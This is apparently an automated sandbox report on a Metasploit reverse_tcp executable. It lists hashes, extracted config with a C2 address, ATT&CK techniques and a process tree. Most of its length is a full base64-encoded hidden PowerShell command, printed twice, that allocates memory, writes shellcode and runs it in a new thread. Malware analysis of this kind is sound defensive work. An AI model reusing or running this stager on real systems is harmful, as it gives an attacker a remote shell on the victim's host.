metasploit | 32a9c4aca0a172b9d4fa886e4ad3567ac90cec76d165237a9d93624f3b833f11

General

Target

32a9c4aca0a172b9d4fa886e4ad3567ac90cec76d165237a9d93624f3b833f11.exe
Size

17KB
MD5

d9b2484af12098d68ac2c39e5962ce60
SHA1

94d52e1d9abb4d83a32d38180633a11a64249e01
SHA256

32a9c4aca0a172b9d4fa886e4ad3567ac90cec76d165237a9d93624f3b833f11
SHA512

6bdfc11db4365a22f639b6881d531e31d7bac37accc2cdb6d6b7cec82fbc91e7f7ebe8e0d24357dab1dd1f7cdb6f1058f4b9f96098358d373f74395af307f706
SSDEEP

384:HEEoLO56ayzcMj+/4y8qYj1jewPbcY5+INel1nfTJYQV:kE8O56lcV/4yrwPbcU+INenfTSQV

Score

10^/10

metasploit backdoor discovery execution trojan

Malware Config

Extracted

Family

metasploit

Version

encoder/shikata_ga_nai

Extracted

Family

metasploit

Version

windows/reverse_tcp

C2

192.168.1.110:4444

Signatures

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Metasploit family
metasploit

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2688	powershell.exe

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2688	powershell.exe
2976	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2688	powershell.exe
Token: SeDebugPrivilege	2976	powershell.exe

Suspicious use of WriteProcessMemory 18 IoCs

description	pid	Process	procid_target
PID 2648 wrote to memory of 2696	2648	32a9c4aca0a172b9d4fa886e4ad3567ac90cec76d165237a9d93624f3b833f11.exe	32
PID 2648 wrote to memory of 2696	2648	32a9c4aca0a172b9d4fa886e4ad3567ac90cec76d165237a9d93624f3b833f11.exe	32
PID 2648 wrote to memory of 2696	2648	32a9c4aca0a172b9d4fa886e4ad3567ac90cec76d165237a9d93624f3b833f11.exe	32
PID 2696 wrote to memory of 2688	2696	cmd.exe	33
PID 2696 wrote to memory of 2688	2696	cmd.exe	33
PID 2696 wrote to memory of 2688	2696	cmd.exe	33
PID 2688 wrote to memory of 2976	2688	powershell.exe	34
PID 2688 wrote to memory of 2976	2688	powershell.exe	34
PID 2688 wrote to memory of 2976	2688	powershell.exe	34
PID 2688 wrote to memory of 2976	2688	powershell.exe	34
PID 2976 wrote to memory of 2740	2976	powershell.exe	35
PID 2976 wrote to memory of 2740	2976	powershell.exe	35
PID 2976 wrote to memory of 2740	2976	powershell.exe	35
PID 2976 wrote to memory of 2740	2976	powershell.exe	35
PID 2740 wrote to memory of 2588	2740	csc.exe	36
PID 2740 wrote to memory of 2588	2740	csc.exe	36
PID 2740 wrote to memory of 2588	2740	csc.exe	36
PID 2740 wrote to memory of 2588	2740	csc.exe	36

C:\Users\Admin\AppData\Local\Temp\32a9c4aca0a172b9d4fa886e4ad3567ac90cec76d165237a9d93624f3b833f11.exe
"C:\Users\Admin\AppData\Local\Temp\32a9c4aca0a172b9d4fa886e4ad3567ac90cec76d165237a9d93624f3b833f11.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2648
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -window hidden -EncodedCommand JAAwADAAOAAgAD0AIAAnACQAOABBADIAQgAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHcAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJAA4AEEAMgBCACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGIAOAAsADAAeAAyADUALAAwAHgANABhACwAMAB4ADgAYgAsADAAeABlADAALAAwAHgAZABiACwAMAB4AGMAYwAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgANQBlACwAMAB4ADIAOQAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADQAYgAsADAAeAAzADEALAAwAHgANAA2ACwAMAB4ADEAMgAsADAAeAAwADMALAAwAHgANAA2ACwAMAB4ADEAMgAsADAAeAA4ADMALAAwAHgAYwBiACwAMAB4AGIANgAsADAAeAA2ADkALAAwAHgAMQA1ACwAMAB4AGUAZgAsADAAeABhAGYALAAwAHgAZQAxACwAMAB4AGQANgAsADAAeAAwAGYALAAwAHgAMwAwACwAMAB4ADkAZQAsADAAeABlADcALAAwAHgAZABkACwAMAB4AGIAOQAsADAAeABiAGIALAAwAHgANgBjACwAMAB4ADYAYQAsADAAeABlAGIALAAwAHgANwAzACwAMAB4AGUANgAsADAAeAAzAGUALAAwAHgAMAAwACwAMAB4AGYAZgAsADAAeABhAGEALAAwAHgAYQBhACwAMAB4ADEANwAsADAAeAA0ADgALAAwAHgAMAAwACwAMAB4AGYANAAsADAAeABhAGMALAAwAHgAYwA0ACwAMAB4AGIAZAAsADAAeABjADkALAAwAHgANABkACwAMAB4ADEAOQAsADAAeAA3AGUALAAwAHgAOAA1ACwAMAB4ADgAZQAsADAAeAAzAGIALAAwAHgAMAAyACwAMAB4AGQANwAsADAAeABjADIALAAwAHgAOQBiACwAMAB4ADMAYgAsADAAeAAxADgALAAwAHgAMQA3ACwAMAB4AGQAZAAsADAAeAA3AGMALAAwAHgAZQBmACwAMAB4ADUAZAAsADAAeAAzADIALAAwAHgAZAAwACwAMAB4AGIAOAAsADAAeAAxADYALAAwAHgAOQBlACwAMAB4AGMANQAsADAAeABjAGQALAAwAHgANgBiACwAMAB4ADIAMwAsADAAeABlADcALAAwAHgAMAAxACwAMAB4AGUAMAAsADAAeAAxAGIALAAwAHgAOQBmACwAMAB4ADIANAAsADAAeAAzADcALAAwAHgAZQBmACwAMAB4ADEAMwAsADAAeAAyADcALAAwAHgANgA4ACwAMAB4ADkAYgAsADAAeABmADQALAAwAHgAMAA3ACwAMAB4AGQAOAAsADAAeAAxADcALAAwAHgANABjACwAMAB4ADUAZgAsADAAeABkADkALAAwAHgAZgA0ACwAMAB4AGMAOAAsADAAeAA5ADYALAAwAHgAYQBkACwAMAB4AGMANgAsADAAeABlADMALAAwAHgAZAA3ACwAMAB4ADAANwAsADAAeABiAGMALAAwAHgAMwAwACwAMAB4AGEAYwAsADAAeAA5ADkALAAwAHgAMQA0ACwAMAB4ADAAOQAsADAAeAA3ADIALAAwAHgAMwA1ACwAMAB4ADUAOQAsADAAeABhADUALAAwAHgANwBmACwAMAB4ADQANwAsADAAeAA5AGQALAAwAHgAMAAyACwAMAB4ADkAZgAsADAAeAAzADIALAAwAHgAZAA1ACwAMAB4ADcAMAAsADAAeAAyADIALAAwAHgANAA1ACwAMAB4ADIAZQAsADAAeAAwAGEALAAwAHgAZgA4ACwAMAB4AGMAMAAsADAAeABiADEALAAwAHgAYQBjACwAMAB4ADgAYgAsADAAeAA3ADMALAAwAHgAMQA2ACwAMAB4ADQAYwAsADAAeAA1ADgALAAwAHgAZQA1ACwAMAB4AGQAZAAsADAAeAA0ADIALAAwAHgAMQA1ACwAMAB4ADYAMQAsADAAeABiADkALAAwAHgANAA2ACwAMAB4AGEAOAAsADAAeABhADYALAAwAHgAYgAxACwAMAB4ADcAMwAsADAAeAAyADEALAAwAHgANAA5ACwAMAB4ADEANgAsADAAeABmADIALAAwAHgANwAxACwAMAB4ADYAZQAsADAAeABiADIALAAwAHgANQBlACwAMAB4ADIAMgAsADAAeAAwAGYALAAwAHgAZQAzACwAMAB4ADMAYQAsADAAeAA4ADUALAAwAHgAMwAwACwAMAB4AGYAMwAsADAAeABlADMALAAwAHgANwBhACwAMAB4ADkANQAsADAAeAA3AGYALAAwAHgAMAAxACwAMAB4ADYAZAAsADAAeABhADkALAAwAHgANwBmACwAMAB4AGQAOQAsADAAeAA5ADIALAAwAHgAZgA3ACwAMAB4ADEANwAsADAAeAAxADUALAAwAHgANQBlACwAMAB4ADAAOAAsADAAeABlADgALAAwAHgAMwAxACwAMAB4AGUAOQAsADAAeAA3AGIALAAwAHgAZABhACwAMAB4ADkAZQAsADAAeAA0ADEALAAwAHgAMQA0ACwAMAB4ADUANgAsADAAeAA1ADYALAAwAHgANABmACwAMAB4AGUAMwAsADAAeABlAGYALAAwAHgANwAwACwAMAB4ADcAMAAsADAAeAAzAGIALAAwAHgANQA3ACwAMAB4ADEAMAAsADAAeAA4AGYALAAwAHgAYgBjACwAMAB4AGEAOAAsADAAeAAzADgALAAwAHgANABiACwAMAB4AGUAOAAsADAAeABmADgALAAwAHgANQAyACwAMAB4ADcAYQAsADAAeAA5ADEALAAwAHgAOQAyACwAMAB4AGEAMgAsADAAeAA4ADMALAAwAHgANAA0ACwAMAB4ADAAZQAsADAAeABhADkALAAwAHgAMQAzACwAMAB4AGEANwAsADAAeAA2ADcALAAwAHgAYQBjACwAMAB4ADgAZAAsADAAeAA0AGYALAAwAHgANwBhACwAMAB4AGEAZgAsADAAeAA0ADAALAAwAHgAYwBjACwAMAB4AGYAMwAsADAAeAA0ADkALAAwAHgAMwAyACwAMAB4AGIAYwAsADAAeAA1ADMALAAwAHgAYwA2ACwAMAB4AGYAMgAsADAAeAA2AGMALAAwAHgAMQA0ACwAMAB4AGIANgAsADAAeAA5AGEALAAwAHgANgA2ACwAMAB4ADkAYgAsADAAeABlADkALAAwAHgAYgBhACwAMAB4ADgAOAAsADAAeAA3ADEALAAwAHgAOAAyACwAMAB4ADUAMAAsADAAeAA2ADcALAAwAHgAMgBjACwAMAB4AGYAYQAsADAAeABjAGMALAAwAHgAMQBlACwAMAB4ADcANQAsADAAeAA3ADAALAAwAHgANgBkACwAMAB4AGQAZQAsADAAeABhADMALAAwAHgAZgBjACwAMAB4AGEAZAAsADAAeAA1ADQALAAwAHgANAAwACwAMAB4ADAAMAAsADAAeAA2ADMALAAwAHgAOQBkACwAMAB4ADIAZAAsADAAeAAxADIALAAwAHgAMQAzACwAMAB4ADYAZAAsADAAeAA3ADgALAAwAHgANAA4ACwAMAB4AGIANQAsADAAeAA3ADIALAAwAHgANQA2ACwAMAB4AGUANwAsADAAeAAzADkALAAwAHgAZQA3ACwAMAB4ADUAZAAsADAAeABhAGUALAAwAHgANgBlACwAMAB4ADkAZgAsADAAeAA1AGYALAAwAHgAOQA3ACwAMAB4ADUAOAAsADAAeAAwADAALAAwAHgAOQBmACwAMAB4AGYAMgAsADAAeABkADMALAAwAHgAOAA5ACwAMAB4ADMANQAsADAAeABiAGQALAAwAHgAOABiACwAMAB4AGYANQAsADAAeABkADkALAAwAHgAMwBkACwAMAB4ADQAYgAsADAAeABhADAALAAwAHgAYgAzACwAMAB4ADMAZAAsADAAeAAyADMALAAwAHgAMQA0ACwAMAB4AGUAMAAsADAAeAA2AGQALAAwAHgANQA2ACwAMAB4ADUAYgAsADAAeAAzAGQALAAwAHgAMAAyACwAMAB4AGMAYgAsADAAeABjAGUALAAwAHgAYgBlACwAMAB4ADcAMwAsADAAeABiADgALAAwAHgANQA5ACwAMAB4AGQANwAsADAAeAA3ADkALAAwAHgAZQA3ACwAMAB4AGEAZQAsADAAeAA3ADgALAAwAHgAOAAxACwAMAB4AGMAMgAsADAAeAAyAGUALAAwAHgANAA0ACwAMAB4ADUANAAsADAAeAAyAGEALAAwAHgANAA1ACwAMAB4AGEANAAsADAAeAA2ADQAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAGgAWgBpAD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABoAFoAaQAuAFQAbwBJAG4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQAaABaAGkALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsAJwA7ACQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAQgB5AHQAZQBzACgAJAAwADAAOAApACkAOwAkADUAZwA5ACAAPQAgACIALQBlAG4AYwAgACIAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADgAKQB7ACQAYgBtAFcAagAgAD0AIAAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAAgACsAIAAiAFwAcwB5AHMAdwBvAHcANgA0AFwAVwBpAG4AZABvAHcAcwBQAG8AdwBlAHIAUwBoAGUAbABsAFwAdgAxAC4AMABcAHAAbwB3AGUAcgBzAGgAZQBsAGwAIgA7AGkAZQB4ACAAIgAmACAAJABiAG0AVwBqACAAJAA1AGcAOQAgACQAZQAiAH0AZQBsAHMAZQB7ADsAaQBlAHgAIAAiACYAIABwAG8AdwBlAHIAcwBoAGUAbABsACAAJAA1AGcAOQAgACQAZQAiADsAfQA=
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2696
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -window hidden -EncodedCommand JAAwADAAOAAgAD0AIAAnACQAOABBADIAQgAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHcAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJAA4AEEAMgBCACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGIAOAAsADAAeAAyADUALAAwAHgANABhACwAMAB4ADgAYgAsADAAeABlADAALAAwAHgAZABiACwAMAB4AGMAYwAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgANQBlACwAMAB4ADIAOQAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADQAYgAsADAAeAAzADEALAAwAHgANAA2ACwAMAB4ADEAMgAsADAAeAAwADMALAAwAHgANAA2ACwAMAB4ADEAMgAsADAAeAA4ADMALAAwAHgAYwBiACwAMAB4AGIANgAsADAAeAA2ADkALAAwAHgAMQA1ACwAMAB4AGUAZgAsADAAeABhAGYALAAwAHgAZQAxACwAMAB4AGQANgAsADAAeAAwAGYALAAwAHgAMwAwACwAMAB4ADkAZQAsADAAeABlADcALAAwAHgAZABkACwAMAB4AGIAOQAsADAAeABiAGIALAAwAHgANgBjACwAMAB4ADYAYQAsADAAeABlAGIALAAwAHgANwAzACwAMAB4AGUANgAsADAAeAAzAGUALAAwAHgAMAAwACwAMAB4AGYAZgAsADAAeABhAGEALAAwAHgAYQBhACwAMAB4ADEANwAsADAAeAA0ADgALAAwAHgAMAAwACwAMAB4AGYANAAsADAAeABhAGMALAAwAHgAYwA0ACwAMAB4AGIAZAAsADAAeABjADkALAAwAHgANABkACwAMAB4ADEAOQAsADAAeAA3AGUALAAwAHgAOAA1ACwAMAB4ADgAZQAsADAAeAAzAGIALAAwAHgAMAAyACwAMAB4AGQANwAsADAAeABjADIALAAwAHgAOQBiACwAMAB4ADMAYgAsADAAeAAxADgALAAwAHgAMQA3ACwAMAB4AGQAZAAsADAAeAA3AGMALAAwAHgAZQBmACwAMAB4ADUAZAAsADAAeAAzADIALAAwAHgAZAAwACwAMAB4AGIAOAAsADAAeAAxADYALAAwAHgAOQBlACwAMAB4AGMANQAsADAAeABjAGQALAAwAHgANgBiACwAMAB4ADIAMwAsADAAeABlADcALAAwAHgAMAAxACwAMAB4AGUAMAAsADAAeAAxAGIALAAwAHgAOQBmACwAMAB4ADIANAAsADAAeAAzADcALAAwAHgAZQBmACwAMAB4ADEAMwAsADAAeAAyADcALAAwAHgANgA4ACwAMAB4ADkAYgAsADAAeABmADQALAAwAHgAMAA3ACwAMAB4AGQAOAAsADAAeAAxADcALAAwAHgANABjACwAMAB4ADUAZgAsADAAeABkADkALAAwAHgAZgA0ACwAMAB4AGMAOAAsADAAeAA5ADYALAAwAHgAYQBkACwAMAB4AGMANgAsADAAeABlADMALAAwAHgAZAA3ACwAMAB4ADAANwAsADAAeABiAGMALAAwAHgAMwAwACwAMAB4AGEAYwAsADAAeAA5ADkALAAwAHgAMQA0ACwAMAB4ADAAOQAsADAAeAA3ADIALAAwAHgAMwA1ACwAMAB4ADUAOQAsADAAeABhADUALAAwAHgANwBmACwAMAB4ADQANwAsADAAeAA5AGQALAAwAHgAMAAyACwAMAB4ADkAZgAsADAAeAAzADIALAAwAHgAZAA1ACwAMAB4ADcAMAAsADAAeAAyADIALAAwAHgANAA1ACwAMAB4ADIAZQAsADAAeAAwAGEALAAwAHgAZgA4ACwAMAB4AGMAMAAsADAAeABiADEALAAwAHgAYQBjACwAMAB4ADgAYgAsADAAeAA3ADMALAAwAHgAMQA2ACwAMAB4ADQAYwAsADAAeAA1ADgALAAwAHgAZQA1ACwAMAB4AGQAZAAsADAAeAA0ADIALAAwAHgAMQA1ACwAMAB4ADYAMQAsADAAeABiADkALAAwAHgANAA2ACwAMAB4AGEAOAAsADAAeABhADYALAAwAHgAYgAxACwAMAB4ADcAMwAsADAAeAAyADEALAAwAHgANAA5ACwAMAB4ADEANgAsADAAeABmADIALAAwAHgANwAxACwAMAB4ADYAZQAsADAAeABiADIALAAwAHgANQBlACwAMAB4ADIAMgAsADAAeAAwAGYALAAwAHgAZQAzACwAMAB4ADMAYQAsADAAeAA4ADUALAAwAHgAMwAwACwAMAB4AGYAMwAsADAAeABlADMALAAwAHgANwBhACwAMAB4ADkANQAsADAAeAA3AGYALAAwAHgAMAAxACwAMAB4ADYAZAAsADAAeABhADkALAAwAHgANwBmACwAMAB4AGQAOQAsADAAeAA5ADIALAAwAHgAZgA3ACwAMAB4ADEANwAsADAAeAAxADUALAAwAHgANQBlACwAMAB4ADAAOAAsADAAeABlADgALAAwAHgAMwAxACwAMAB4AGUAOQAsADAAeAA3AGIALAAwAHgAZABhACwAMAB4ADkAZQAsADAAeAA0ADEALAAwAHgAMQA0ACwAMAB4ADUANgAsADAAeAA1ADYALAAwAHgANABmACwAMAB4AGUAMwAsADAAeABlAGYALAAwAHgANwAwACwAMAB4ADcAMAAsADAAeAAzAGIALAAwAHgANQA3ACwAMAB4ADEAMAAsADAAeAA4AGYALAAwAHgAYgBjACwAMAB4AGEAOAAsADAAeAAzADgALAAwAHgANABiACwAMAB4AGUAOAAsADAAeABmADgALAAwAHgANQAyACwAMAB4ADcAYQAsADAAeAA5ADEALAAwAHgAOQAyACwAMAB4AGEAMgAsADAAeAA4ADMALAAwAHgANAA0ACwAMAB4ADAAZQAsADAAeABhADkALAAwAHgAMQAzACwAMAB4AGEANwAsADAAeAA2ADcALAAwAHgAYQBjACwAMAB4ADgAZAAsADAAeAA0AGYALAAwAHgANwBhACwAMAB4AGEAZgAsADAAeAA0ADAALAAwAHgAYwBjACwAMAB4AGYAMwAsADAAeAA0ADkALAAwAHgAMwAyACwAMAB4AGIAYwAsADAAeAA1ADMALAAwAHgAYwA2ACwAMAB4AGYAMgAsADAAeAA2AGMALAAwAHgAMQA0ACwAMAB4AGIANgAsADAAeAA5AGEALAAwAHgANgA2ACwAMAB4ADkAYgAsADAAeABlADkALAAwAHgAYgBhACwAMAB4ADgAOAAsADAAeAA3ADEALAAwAHgAOAAyACwAMAB4ADUAMAAsADAAeAA2ADcALAAwAHgAMgBjACwAMAB4AGYAYQAsADAAeABjAGMALAAwAHgAMQBlACwAMAB4ADcANQAsADAAeAA3ADAALAAwAHgANgBkACwAMAB4AGQAZQAsADAAeABhADMALAAwAHgAZgBjACwAMAB4AGEAZAAsADAAeAA1ADQALAAwAHgANAAwACwAMAB4ADAAMAAsADAAeAA2ADMALAAwAHgAOQBkACwAMAB4ADIAZAAsADAAeAAxADIALAAwAHgAMQAzACwAMAB4ADYAZAAsADAAeAA3ADgALAAwAHgANAA4ACwAMAB4AGIANQAsADAAeAA3ADIALAAwAHgANQA2ACwAMAB4AGUANwAsADAAeAAzADkALAAwAHgAZQA3ACwAMAB4ADUAZAAsADAAeABhAGUALAAwAHgANgBlACwAMAB4ADkAZgAsADAAeAA1AGYALAAwAHgAOQA3ACwAMAB4ADUAOAAsADAAeAAwADAALAAwAHgAOQBmACwAMAB4AGYAMgAsADAAeABkADMALAAwAHgAOAA5ACwAMAB4ADMANQAsADAAeABiAGQALAAwAHgAOABiACwAMAB4AGYANQAsADAAeABkADkALAAwAHgAMwBkACwAMAB4ADQAYgAsADAAeABhADAALAAwAHgAYgAzACwAMAB4ADMAZAAsADAAeAAyADMALAAwAHgAMQA0ACwAMAB4AGUAMAAsADAAeAA2AGQALAAwAHgANQA2ACwAMAB4ADUAYgAsADAAeAAzAGQALAAwAHgAMAAyACwAMAB4AGMAYgAsADAAeABjAGUALAAwAHgAYgBlACwAMAB4ADcAMwAsADAAeABiADgALAAwAHgANQA5ACwAMAB4AGQANwAsADAAeAA3ADkALAAwAHgAZQA3ACwAMAB4AGEAZQAsADAAeAA3ADgALAAwAHgAOAAxACwAMAB4AGMAMgAsADAAeAAyAGUALAAwAHgANAA0ACwAMAB4ADUANAAsADAAeAAyAGEALAAwAHgANAA1ACwAMAB4AGEANAAsADAAeAA2ADQAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAGgAWgBpAD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABoAFoAaQAuAFQAbwBJAG4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQAaABaAGkALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsAJwA7ACQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAQgB5AHQAZQBzACgAJAAwADAAOAApACkAOwAkADUAZwA5ACAAPQAgACIALQBlAG4AYwAgACIAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADgAKQB7ACQAYgBtAFcAagAgAD0AIAAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAAgACsAIAAiAFwAcwB5AHMAdwBvAHcANgA0AFwAVwBpAG4AZABvAHcAcwBQAG8AdwBlAHIAUwBoAGUAbABsAFwAdgAxAC4AMABcAHAAbwB3AGUAcgBzAGgAZQBsAGwAIgA7AGkAZQB4ACAAIgAmACAAJABiAG0AVwBqACAAJAA1AGcAOQAgACQAZQAiAH0AZQBsAHMAZQB7ADsAaQBlAHgAIAAiACYAIABwAG8AdwBlAHIAcwBoAGUAbABsACAAJAA1AGcAOQAgACQAZQAiADsAfQA=
    3⤵
